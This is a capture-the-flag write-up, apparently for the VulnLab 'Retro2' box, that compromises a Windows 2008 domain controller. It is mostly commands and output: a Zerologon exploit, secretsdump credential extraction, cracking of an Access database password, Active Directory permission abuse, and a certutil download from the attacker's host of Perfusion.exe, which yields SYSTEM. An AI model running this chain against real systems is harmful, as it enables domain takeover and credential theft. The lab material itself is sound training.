vulnlab-retro2
Retro2 is an easy old-school Windows 2008 DC , that involves decrypting MSAccess database, Pre-Created Computer Accounts, GenericWrite, AddMember & Perfusion.exe
nmap scan
# Nmap 7.93 scan initiated Wed Aug 28 09:41:18 2024 as: nmap -Pn -sC -sV -oN retro2.nmap 10.10.122.16 Nmap scan report for 10.10.122.16 Host is up (0.019s latency). Not shown: 988 filtered tcp ports (no-response) PORT STATE SERVICE VERSION 88/tcp open kerberos-sec Microsoft Windows Kerberos (server time: 2024-08-28 07:41:28Z) 135/tcp open msrpc Microsoft Windows RPC 139/tcp open netbios-ssn Microsoft Windows netbios-ssn 389/tcp open ldap Microsoft Windows Active Directory LDAP (Domain: retro2.vl, Site: Default-First-Site-Name) 445/tcp open microsoft-ds Windows Server 2008 R2 Datacenter 7601 Service Pack 1 microsoft-ds (workgroup: RETRO2) 464/tcp open kpasswd5? 593/tcp open ncacn_http Microsoft Windows RPC over HTTP 1.0 636/tcp open tcpwrapped 49154/tcp open msrpc Microsoft Windows RPC 49155/tcp open msrpc Microsoft Windows RPC 49157/tcp open ncacn_http Microsoft Windows RPC over HTTP 1.0 49158/tcp open msrpc Microsoft Windows RPC Service Info: Host: BLN01; OS: Windows; CPE: cpe:/o:microsoft:windows Host script results: | smb2-security-mode: | 210: |_ Message signing enabled and required |_clock-skew: mean: -40m00s, deviation: 1h09m16s, median: -1s | smb-os-discovery: | OS: Windows Server 2008 R2 Datacenter 7601 Service Pack 1 (Windows Server 2008 R2 Datacenter 6.1) | OS CPE: cpe:/o:microsoft:windows_server_2008::sp1 | Computer name: BLN01 | NetBIOS computer name: BLN01\x00 | Domain name: retro2.vl | Forest name: retro2.vl | FQDN: BLN01.retro2.vl |_ System time: 2024-08-28T09:42:17+02:00 | smb2-time: | date: 2024-08-28T07:42:18 |_ start_date: 2024-08-28T07:40:52 | smb-security-mode: | account_used: guest | authentication_level: user | challenge_response: supported |_ message_signing: required Service detection performed. Please report any incorrect results at https://nmap.org/submit/ . # Nmap done at Wed Aug 28 09:42:57 2024 -- 1 IP address (1 host up) scanned in 99.04 seconds
unintended zerologon
┌──(puck㉿kali)-[~/vulnlab/retro2] └─$ python3 cve-2020-1472-exploit.py bln01 10.10.122.16 Performing authentication attempts... =============================================================================================== Target vulnerable, changing account password to empty string Result: 0 Exploit complete!
netexec
┌──(puck㉿kali)-[~/vulnlab/retro2] └─$ impacket-secretsdump -just-dc -no-pass bln01\$@10.10.122.16 Impacket v0.12.0.dev1 - Copyright 2023 Fortra [*] Dumping Domain Credentials (domain\uid:rid:lmhash:nthash) [*] Using the DRSUAPI method to get NTDS.DIT secrets Administrator:500:aad3b435b51404eeaad3b435b51404ee:c0<redacted>48:::
enumerate SMB shares
┌──(puck㉿kali)-[~/vulnlab/retro2] └─$ netexec smb 10.10.122.16 SMB 10.10.122.16 445 BLN01 [*] Windows Server 2008 R2 Datacenter 7601 Service Pack 1 x64 (name:BLN01) (domain:retro2.vl) (signing:True) (SMBv1:True)
.
┌──(puck㉿kali)-[~/vulnlab/retro2] └─$ netexec smb 10.10.122.16 -u 'puck' -p '' --shares SMB 10.10.122.16 445 BLN01 [*] Windows Server 2008 R2 Datacenter 7601 Service Pack 1 x64 (name:BLN01) (domain:retro2.vl) (signing:True) (SMBv1:True) SMB 10.10.122.16 445 BLN01 [+] retro2.vl\puck: SMB 10.10.122.16 445 BLN01 [*] Enumerated shares SMB 10.10.122.16 445 BLN01 Share Permissions Remark SMB 10.10.122.16 445 BLN01 ----- ----------- ------ SMB 10.10.122.16 445 BLN01 ADMIN$ Remote Admin SMB 10.10.122.16 445 BLN01 C$ Default share SMB 10.10.122.16 445 BLN01 IPC$ Remote IPC SMB 10.10.122.16 445 BLN01 NETLOGON Logon server share SMB 10.10.122.16 445 BLN01 Public READ SMB 10.10.122.16 445 BLN01 SYSVOL Logon server share
.
┌──(puck㉿kali)-[~/vulnlab/retro2] └─$ impacket-smbclient guest@retro2.vl -no-pass Impacket v0.12.0.dev1 - Copyright 2023 Fortra Type help for list of commands # use Public # ls drw-rw-rw- 0 Sat Aug 17 16:30:37 2024 . drw-rw-rw- 0 Sat Aug 17 16:30:37 2024 .. drw-rw-rw- 0 Sat Aug 17 16:30:37 2024 DB drw-rw-rw- 0 Sat Aug 17 13:58:07 2024 Temp # cd DB # ls drw-rw-rw- 0 Sat Aug 17 16:30:37 2024 . drw-rw-rw- 0 Sat Aug 17 16:30:37 2024 .. -rw-rw-rw- 876544 Sat Aug 17 16:30:34 2024 staff.accdb # get staff.accdb
If we open it with Microsoft Access, it prompts for a password. We use office2john to extract the hash and then crack it.
┌──(puck㉿kali)-[~/vulnlab/retro2] └─$ office2john staff.accdb | tee officehash staff.accdb:$office$*2013*100000*256*16*5736<redacted>8235 ┌──(puck㉿kali)-[~/vulnlab/retro2] └─$ john officehash.txt --wordlist=/usr/share/wordlists/rockyou.txt Using default input encoding: UTF-8 Loaded 1 password hash (Office, 2007/2010/2013 [SHA1 256/256 AVX2 8x / SHA512 256/256 AVX2 4x AES]) Cost 1 (MS Office version) is 2013 for all loaded hashes Cost 2 (iteration count) is 100000 for all loaded hashes Will run 8 OpenMP threads Press 'q' or Ctrl-C to abort, almost any other key for status 0g 0:00:00:03 0.00% (ETA: 06:07:07) 0g/s 223.4p/s 223.4c/s 223.4C/s bambam..james1 cl<redacted>08 (staff.accdb)
in accesdb we find
strsUser = “retro2\ldapreader”
strsPassword = “pp<redacted>5R”
Bloodhound analyze
bloodhound-python -d retro2.vl -c all -u ldapreader -p pp<redacted>5R -ns 10.10.122.16 --dns-tcp --zip
we find:
The computer Account FS01 is a member of the Domain Computers group. The Domain Computers group has GenericWrite over ADMWS01. ADMWS01 has the AddSelf permission over the Services group. Services group members can RDP to DC BLN01
.
we have guessed pasword computer is same as computername FS01 ,we cannot use this computer account, because the password has not been changed. so we use rpcchangepwd.py
wget https://raw.githubusercontent.com/api0cradle/impacket/a1d0cc99ff1bd4425eddc1b28add1f269ff230a6/examples/rpcchangepwd.py
.
┌──(puck㉿kali)-[~/vulnlab/retro2] └─$ python3 rpcchangepwd.py retro2.vl/fs01\$:fs01@10.10.122.16 -newpass P@ssw0rd Impacket v0.12.0.dev1 - Copyright 2023 Fortra [*] Password was changed successfully.
abuse the GenericWrite permission
┌──(puck㉿kali)-[~/vulnlab/retro2] └─$ netexec smb retro2.vl -u 'fs01$' -p 'P@ssw0rd' SMB 10.10.122.16 445 BLN01 [*] Windows Server 2008 R2 Datacenter 7601 Service Pack 1 x64 (name:BLN01) (domain:retro2.vl) (signing:True) (SMBv1:True) SMB 10.10.122.16 445 BLN01 [+] retro2.vl\fs01$:P@ssw0rd
.
┌──(puck㉿kali)-[~/vulnlab/retro2] └─$ net rpc password 'ADMWS01$' Passw0rd1 -U retro2.vl/'fs01$'%P@ssw0rd -S bln01.retro2.vl
.
┌──(puck㉿kali)-[~/vulnlab/retro2] └─$ netexec smb retro2.vl -u 'ADMWS01$' -p 'P@ssw0rd' SMB 10.10.122.16 445 BLN01 [*] Windows Server 2008 R2 Datacenter 7601 Service Pack 1 x64 (name:BLN01) (domain:retro2.vl) (signing:True) (SMBv1:True) SMB 10.10.122.16 445 BLN01 [-] retro2.vl\ADMWS01$:P@ssw0rd STATUS_LOGON_FAILURE
.
with BloodyAD we add ‘ldapreader’ to the Services group
┌──(puck㉿kali)-[~/vulnlab/delegate/krbrelayx/bloodyAD] └─$ python3 bloodyAD.py --host 10.10.122.16 -d retro2.vl -u 'ADMWS01$' -p 'Passw0rd1' add groupMember 'SERVICES' 'ldapreader' [+] ldapreader added to SERVICES
now we can RDP into the box
┌──(puck㉿kali)-[~/vulnlab/retro2] └─$ xfreerdp /u:'ldapreader' /p:'pp<redacted>5R' /v:10.10.122.16 /d:retro2.vl /tls-seclevel:0
Privesc
Any local user can create a Performance
subkey and then leverage the Windows Performance Counters to load an arbitrary DLL in the context of the WMI service as NT AUTHORITY\SYSTEM
(hence the tool’s name).
c:\temp>certutil.exe -urlcache -f http://10.8.2.138:8000/Perfusion.exe Perfusion .exe **** Online **** CertUtil: -URLCache command completed successfully. c:\temp> .\Perfusion.exe -c cmd -i [*] Created Performance DLL: C:\Users\LDAPRE~1\AppData\Local\Temp\2\performance_ 2844_2224_2.dll [*] Created Performance registry key. [*] Triggered Performance data collection. [+] Exploit completed. Got a SYSTEM token! :) [*] Waiting for the Trigger Thread to terminate... OK [!] Failed to delete Performance registry key. [*] Deleted Performance DLL. Microsoft Windows [Version 6.1.7601] Copyright (c) 2009 Microsoft Corporation. All rights reserved. c:\temp>whoami nt authority\system c:\temp>type c:\users\administrator\desktop\root.txt VL{fc<redacted>46}
That was oldschool fun